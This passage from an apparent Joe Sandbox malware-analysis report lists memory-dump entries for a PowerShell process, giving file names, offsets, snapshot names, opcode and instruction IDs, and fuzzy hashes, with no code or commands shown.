                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2610933736.0000000004D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_4d70000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 53c3dafe271f71013bb035352f6556800b838432646fbab63b42abe44288f4ca
                                                                                                                                    • Instruction ID: d2616d623ae4c07ea0be35e5089d2b535b2da08d298ad57d2197cda4af46c1af
                                                                                                                                    • Opcode Fuzzy Hash: 53c3dafe271f71013bb035352f6556800b838432646fbab63b42abe44288f4ca
                                                                                                                                    • Instruction Fuzzy Hash: 79D13974A012499FDB05DFA8D490A9DFBF2FF88310F24815AE845AB351DB31ED86CB90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2674865150.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_75d0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9d0d2f6d6b907bb446d62d0bf429332adb4180ebdc24862d178a5849ca818426
                                                                                                                                    • Instruction ID: 1d6e91fc3729e4889ddd2a94425b75bf4cc5a39a650ee4154e20572d4ae25985
                                                                                                                                    • Opcode Fuzzy Hash: 9d0d2f6d6b907bb446d62d0bf429332adb4180ebdc24862d178a5849ca818426
                                                                                                                                    • Instruction Fuzzy Hash: 7D8193B17002069FDB34DE5DC541AEA7BE2BF89351F18885AE8149B390DB35DD41CBA1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2463551200b559c1f1076886639b22544248695e653376431272e26dd3303669
                                                                                                                                    • Instruction ID: 2b947622c6f72da4bd5b44136d8ae27c2200acf4adc1cb343614f6b599461cf8
                                                                                                                                    • Opcode Fuzzy Hash: 2463551200b559c1f1076886639b22544248695e653376431272e26dd3303669
                                                                                                                                    • Instruction Fuzzy Hash: A641E9B2B001159BCF149FB988511BEBBEAAFC4310F24846ADC15DB385DA31DD41CBD5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2610933736.0000000004D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_4d70000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a68335c876f77492be41c151a541ccdcab6971e625030c53dc9c3c3691debe75
                                                                                                                                    • Instruction ID: b3988d5403f1f4d360d98b86d9c5df986b68b67017b53f6340c4f6a06b8a073a
                                                                                                                                    • Opcode Fuzzy Hash: a68335c876f77492be41c151a541ccdcab6971e625030c53dc9c3c3691debe75
                                                                                                                                    • Instruction Fuzzy Hash: 7B51D674A00208AFDB14DFA8D484AADFBF6BF88714F24C559E404AB355DB35ED86CB90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2674865150.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_75d0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: bac34c4e56f6f4232a5d0c6595f32164964236ae7fefcf7488c4a4f0ece4a971
                                                                                                                                    • Instruction ID: 9f3ebf0a9726924232e45ad27c210b34b4a2cec7cad42d61475b640851db1e6c
                                                                                                                                    • Opcode Fuzzy Hash: bac34c4e56f6f4232a5d0c6595f32164964236ae7fefcf7488c4a4f0ece4a971
                                                                                                                                    • Instruction Fuzzy Hash: E7416D75700205AFCB18DF6DC54199EBBE2FFC8310B258959EC05AB790CB71ED028BA5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2676237741.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77e0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: fa7609f2479423fb71a4b0546c9bc07c213bed3029f821193aed52997a50bf11
                                                                                                                                    • Instruction ID: bab5b605a105be986173f7371a2b629c7c0b2cd1d29b93772399042caff02ea7
                                                                                                                                    • Opcode Fuzzy Hash: fa7609f2479423fb71a4b0546c9bc07c213bed3029f821193aed52997a50bf11
                                                                                                                                    • Instruction Fuzzy Hash: 453147B8E042098FDB04DFAAD8452EEBBF6EB8A300F10952AC415BB345D73549448BA0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9327765bf77e847ca0b93cf5941a132d9744a71295ce2f521886c7dd7eec3874
                                                                                                                                    • Instruction ID: 347e4f8e46e1ce95952033b04128e6fb0e13497c7478833af51cdda0f5b4412b
                                                                                                                                    • Opcode Fuzzy Hash: 9327765bf77e847ca0b93cf5941a132d9744a71295ce2f521886c7dd7eec3874
                                                                                                                                    • Instruction Fuzzy Hash: D8214BF1A063955FCF119F39C8401AABFB5AF85210B1945EACC54DB282D634DE40C791
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2676237741.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77e0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: be5f35601ab9ac39e9e0adc4a6fd43d31d15775bf927e6877d435dda50ff1263
                                                                                                                                    • Instruction ID: a1c0bc5804ed942ecf548f4026b41e579980741595af3e252b2dd2faf97ffffa
                                                                                                                                    • Opcode Fuzzy Hash: be5f35601ab9ac39e9e0adc4a6fd43d31d15775bf927e6877d435dda50ff1263
                                                                                                                                    • Instruction Fuzzy Hash: 35217AB4D012198FCB04DFA9D4442FEBBB6EB8E361F11842AC905B7241DB740A84CBA1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2610275024.0000000004C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C7D000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_4c7d000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: aba43de8ea1f3d7f8eebbcdbcbf4b7443a1f1e77522cbf80e0b56e11e5508dbc
                                                                                                                                    • Instruction ID: 1c86d6c185331bf39ff84ae9bf61570d97318565b408dfe3120dc1fd6ff3e9b8
                                                                                                                                    • Opcode Fuzzy Hash: aba43de8ea1f3d7f8eebbcdbcbf4b7443a1f1e77522cbf80e0b56e11e5508dbc
                                                                                                                                    • Instruction Fuzzy Hash: 242134BA604340EFCB05DF14D9C0B26BF66FF84364F28C569E80A0B201C336E446CBA2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2676237741.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77e0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 782b78b55264d7f4773b7fce9b670bffe234388ebbdfeda53849fb3b07ddd04c
                                                                                                                                    • Instruction ID: 25fafa33dad0e1bcef4c58b6df45917444a750e9866233ce10a8cf61766fbe68
                                                                                                                                    • Opcode Fuzzy Hash: 782b78b55264d7f4773b7fce9b670bffe234388ebbdfeda53849fb3b07ddd04c
                                                                                                                                    • Instruction Fuzzy Hash: C1213AB4D01219CFDB04DFAAC4486FEBBB9EB8D310F11C42AD505B7241DB751A848BA1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2610933736.0000000004D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_4d70000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 54e2a2f1068eb6ea32e985fcea009595f1bdd1af46aee2bb7e81f816c3273d89
                                                                                                                                    • Instruction ID: 7b03a0878524d01807b303288c3d87b2985174a6e110ad809c0b564a5a849b98
                                                                                                                                    • Opcode Fuzzy Hash: 54e2a2f1068eb6ea32e985fcea009595f1bdd1af46aee2bb7e81f816c3273d89
                                                                                                                                    • Instruction Fuzzy Hash: DC214D74A052098FCB01CF98D4809AEBBF1FF89310B14819AD849EB351D731ED41CBA1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2b5ac32219e93a0db96984d89ab09fac7f2fb775cc22c0e795f31ff3e8f59126
                                                                                                                                    • Instruction ID: 91a75b3ca9943e64be0c8c47a6c479f1728aea33bf4bbd33c38728bdafa51732
                                                                                                                                    • Opcode Fuzzy Hash: 2b5ac32219e93a0db96984d89ab09fac7f2fb775cc22c0e795f31ff3e8f59126
                                                                                                                                    • Instruction Fuzzy Hash: 101104B67092441FD305EB689850597FFA6AFD6310B28C89FE589CF392CA61DC46C391
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2676237741.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77e0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 99227d3a6fb90b37c1344a61f3bb77adfad761a21b07022bb82bc1da2670d6ba
                                                                                                                                    • Instruction ID: 3ec14e578ac11827dea57d001db9ce9609ba23ce003d1b400946eeadc4339fe2
                                                                                                                                    • Opcode Fuzzy Hash: 99227d3a6fb90b37c1344a61f3bb77adfad761a21b07022bb82bc1da2670d6ba
                                                                                                                                    • Instruction Fuzzy Hash: AF2124B4D0529A9FCB04CFA9D885AEEBBB5FB89310F14803AE404B7250D7380945CBA0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2610933736.0000000004D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_4d70000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 653361255e4fcbe340ed58998d26007f440961db025b16efa64aeb7bc1df30c5
                                                                                                                                    • Instruction ID: bd66374596dd2b91ed02ad0cb8e437143dcb0edbed246e81dd9dae3d87c2de72
                                                                                                                                    • Opcode Fuzzy Hash: 653361255e4fcbe340ed58998d26007f440961db025b16efa64aeb7bc1df30c5
                                                                                                                                    • Instruction Fuzzy Hash: 3E2103B4A0050ADBCB50CF99D5809AAFBF6FF48314B24855AE818E7241DB31FD91CBA0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2676237741.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77e0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a54278e6c389a5f05872af7dafbda467aaa1a7752ba8de4c876ad990eb8ff33d
                                                                                                                                    • Instruction ID: 13ae071c7dcd4521b816e68111a67bca1d94ef2983ebdc26b90e9ce441ee2109
                                                                                                                                    • Opcode Fuzzy Hash: a54278e6c389a5f05872af7dafbda467aaa1a7752ba8de4c876ad990eb8ff33d
                                                                                                                                    • Instruction Fuzzy Hash: 011126B4D0525ADBCB04DF9AD4456EEBBF9FB8D350F10803AE508B3210D7341955CBA0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2610275024.0000000004C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C7D000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_4c7d000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1e37e63c8c1cf8f967ccaf6d2f6d1bcf094384ffa1d72db5f4a4f9073f3402ff
                                                                                                                                    • Instruction ID: 19034eee2886f8394064911d178f536756be219f73f380aea12f115ecafccad6
                                                                                                                                    • Opcode Fuzzy Hash: 1e37e63c8c1cf8f967ccaf6d2f6d1bcf094384ffa1d72db5f4a4f9073f3402ff
                                                                                                                                    • Instruction Fuzzy Hash: 2811D37A504280CFCB11CF10D9C4B16BF72FF84324F28C1A9D8094B616C33AE55ACBA2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2610933736.0000000004D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_4d70000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2027b71efdb278d9e7849f59f7f89fa5ee775b80af40b9bf248c151c1b23bfcc
                                                                                                                                    • Instruction ID: 368af721866dd26dc82b65b90960056c25c7b0a701b572086e7362b1a3adc883
                                                                                                                                    • Opcode Fuzzy Hash: 2027b71efdb278d9e7849f59f7f89fa5ee775b80af40b9bf248c151c1b23bfcc
                                                                                                                                    • Instruction Fuzzy Hash: 7B110474A00218AFCB15CFA8D884AADFBF1BF88304F24C059E404AB361D735ED82CB90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2676237741.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77e0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 11a233d5bab679c5fd835bafe647aab490ccdfc26569c5edba594395f1b06283
                                                                                                                                    • Instruction ID: 2c0bac5ee3db00f82a6fe93857a2a0d137e05b18cadfc7a46da7fcdfa931ad8a
                                                                                                                                    • Opcode Fuzzy Hash: 11a233d5bab679c5fd835bafe647aab490ccdfc26569c5edba594395f1b06283
                                                                                                                                    • Instruction Fuzzy Hash: D2018FB5A04208AFCB40CFA4E9449ADBBF4FB49324F1081DAEC089B321D7329E51CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2610058771.00000000034BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 034BD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_34bd000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 173b243b6dcb67776f95b9af56d25875eebce2184d96f69bff67ea7e6aba8bd4
                                                                                                                                    • Instruction ID: ef96a26edc320fcfc47063f2b2557fa07961bcdc1d6eec57983f38d59e1c1cf6
                                                                                                                                    • Opcode Fuzzy Hash: 173b243b6dcb67776f95b9af56d25875eebce2184d96f69bff67ea7e6aba8bd4
                                                                                                                                    • Instruction Fuzzy Hash: 0801007240E3C05FD7128B258994B52BFB8DF57224F1D81DBD9888F2A7C2695849C772
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2610058771.00000000034BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 034BD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_34bd000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6de68f8a8c8bfd4135e9e6bf60e49f4783b6f6f37a1de2855d7af269ea91e05d
                                                                                                                                    • Instruction ID: a123063646fa3c82cf8401d2f935026fdc0c34de0b29cd00ec1bcee485a6c2a9
                                                                                                                                    • Opcode Fuzzy Hash: 6de68f8a8c8bfd4135e9e6bf60e49f4783b6f6f37a1de2855d7af269ea91e05d
                                                                                                                                    • Instruction Fuzzy Hash: F201D4718053009AE710CE29CCC0BA7FFA8DF42328F1CC4ABED484E242C6799842CAB5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2676237741.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77e0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4327bb503a06bbaff8f7ee404b6045bc23bd0bab75e84911335494253e9048df
                                                                                                                                    • Instruction ID: 525cfe82e5b0748168da3fc9b8c69d39113d1003559f62c98ffb38280cd29272
                                                                                                                                    • Opcode Fuzzy Hash: 4327bb503a06bbaff8f7ee404b6045bc23bd0bab75e84911335494253e9048df
                                                                                                                                    • Instruction Fuzzy Hash: FF1105B4E05258CFDB14DFA9C8846ADBBF9FB4E380F51C469D40AAB259DB349985CF00
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e1fa0410ba3b02abdae2b9e4b586cac3f1b072604d6ac20029e168d6b5994aca
                                                                                                                                    • Instruction ID: f6ebcd85fc30868eae13a330400d0a9592291fbe80ea6f6bfd28cdcf806e01a6
                                                                                                                                    • Opcode Fuzzy Hash: e1fa0410ba3b02abdae2b9e4b586cac3f1b072604d6ac20029e168d6b5994aca
                                                                                                                                    • Instruction Fuzzy Hash: F6F0F4707013183BEA60A77E4812FAE29968F81718F20800DF505DF7C1C8F99C40433A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b60307f2b0f9152cc4aee4d50d78653d32f843213ab603608fa858769708cb05
                                                                                                                                    • Instruction ID: 38bf89e4b43e83ebbc64a277e6fa72b8c2a8636d02d1ef892cc73fbd799bb486
                                                                                                                                    • Opcode Fuzzy Hash: b60307f2b0f9152cc4aee4d50d78653d32f843213ab603608fa858769708cb05
                                                                                                                                    • Instruction Fuzzy Hash: BCF0AF607013183BEA60A77A4812B6A689A8F85B59F608019B605DF7C1D9B9AD80437A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a4057b380c96a5dcf4dd3ff0a7bafbd38662120a71a666c9f7055d06870dc7a7
                                                                                                                                    • Instruction ID: 9256cbb7af33ca70044aadc0f717ad5b3a95a4d644bb2cd811ab238c5da12a27
                                                                                                                                    • Opcode Fuzzy Hash: a4057b380c96a5dcf4dd3ff0a7bafbd38662120a71a666c9f7055d06870dc7a7
                                                                                                                                    • Instruction Fuzzy Hash: DDF02070B142008FE7508698CC81AA6F7A7EFE5224F18C0AAD908CB380CEA3DC438390
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2676237741.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77e0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: af5dbe3a8f1a4ec9c6862962711682d62cfd96d2c5ba4c32c832201c9c1f512c
                                                                                                                                    • Instruction ID: 40e61d273f90c1de3d7bd14671c6a080c881c7974b64da670b9cf79658d8eb55
                                                                                                                                    • Opcode Fuzzy Hash: af5dbe3a8f1a4ec9c6862962711682d62cfd96d2c5ba4c32c832201c9c1f512c
                                                                                                                                    • Instruction Fuzzy Hash: 82F0E5355082049FC301EBA4F8404F8FF78DB87231F2481EBC8446B242C6324E82C791
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2610933736.0000000004D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_4d70000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e3307c19b179d690478343fb166c0338f53c834fbb7267a9231b7d8bf6735528
                                                                                                                                    • Instruction ID: d401962f5de1d11b329807aaf84c166d153e39b46db704f2323497754664c473
                                                                                                                                    • Opcode Fuzzy Hash: e3307c19b179d690478343fb166c0338f53c834fbb7267a9231b7d8bf6735528
                                                                                                                                    • Instruction Fuzzy Hash: BCF0D435A001099FCB15CF9DD890AEEFBB1FF88324F248199E515A73A1C732AD52CB60
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2675815829.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a97d21e1e3bb01d1a409ba7f46a72ca72aecdd7f2f3f959cc91d354141031065
                                                                                                                                    • Instruction ID: f3932ed0121b072901d6aa70c4f3031ba249e2bd153279622bc58a27564d5204
                                                                                                                                    • Opcode Fuzzy Hash: a97d21e1e3bb01d1a409ba7f46a72ca72aecdd7f2f3f959cc91d354141031065
                                                                                                                                    • Instruction Fuzzy Hash: 96E0D8B560E144AFC721DB64E841AE5BFB8DB87354F1440DAD84C57242C6326E52DBA1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2676237741.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77e0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4c538f16fa07ec0d8c461320e2381b1f6b35950970f88d7052b94531315c24a3
                                                                                                                                    • Instruction ID: f7310849a4e2c8964518a9dd0e747955b2c06e485525d65e9507450b1f85e462
                                                                                                                                    • Opcode Fuzzy Hash: 4c538f16fa07ec0d8c461320e2381b1f6b35950970f88d7052b94531315c24a3
                                                                                                                                    • Instruction Fuzzy Hash: B8F0E5B4808304EFCB01DFA8D444969FFB8EF46310F10C1ADDC4827301C6319955DB56
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2676237741.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77e0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9ad3f94ca8c3a2001b8f7f2d5ed2587a56a2c999507066aa1832c723eebdc4a8
                                                                                                                                    • Instruction ID: fa02d65c8e7f9727cedb62fd4ecf74816978bbe34c8f6f76ff4e3ee467c893ee
                                                                                                                                    • Opcode Fuzzy Hash: 9ad3f94ca8c3a2001b8f7f2d5ed2587a56a2c999507066aa1832c723eebdc4a8
                                                                                                                                    • Instruction Fuzzy Hash: 30E026711452044FC325B7B0B84AAE47F28DB06266B280297D84D1B122CA270185CAA6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2676237741.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77e0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 18ddbdfdfc69ce4763e145f87dc775f75739d8cf116d3809de46aff2486c453d
                                                                                                                                    • Instruction ID: c12c98d16f78c2a74b44ebe0633406fb1bb365eccc504b44cbe9f4a369c31115
                                                                                                                                    • Opcode Fuzzy Hash: 18ddbdfdfc69ce4763e145f87dc775f75739d8cf116d3809de46aff2486c453d
                                                                                                                                    • Instruction Fuzzy Hash: 7AF0A5B4D04208EFCB84DFA8D544A9DFBF5EB48314F10C0AAAC18A7350D6329A51DF40
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2676237741.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77e0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: db4c33b2506d32efcd4013a12bf4a059b0d56bba6d3065bdc4bb1c7f5358eebb
                                                                                                                                    • Instruction ID: 549a48841b11747a5be4f227f4290dbe02c9207e3a620e467ba0e8ba069d5bf2
                                                                                                                                    • Opcode Fuzzy Hash: db4c33b2506d32efcd4013a12bf4a059b0d56bba6d3065bdc4bb1c7f5358eebb
                                                                                                                                    • Instruction Fuzzy Hash: ABE06D78804108EBCB01DF94D940DADBBB9EB49310F10C059EC4827250C7329A61EB50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2676237741.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
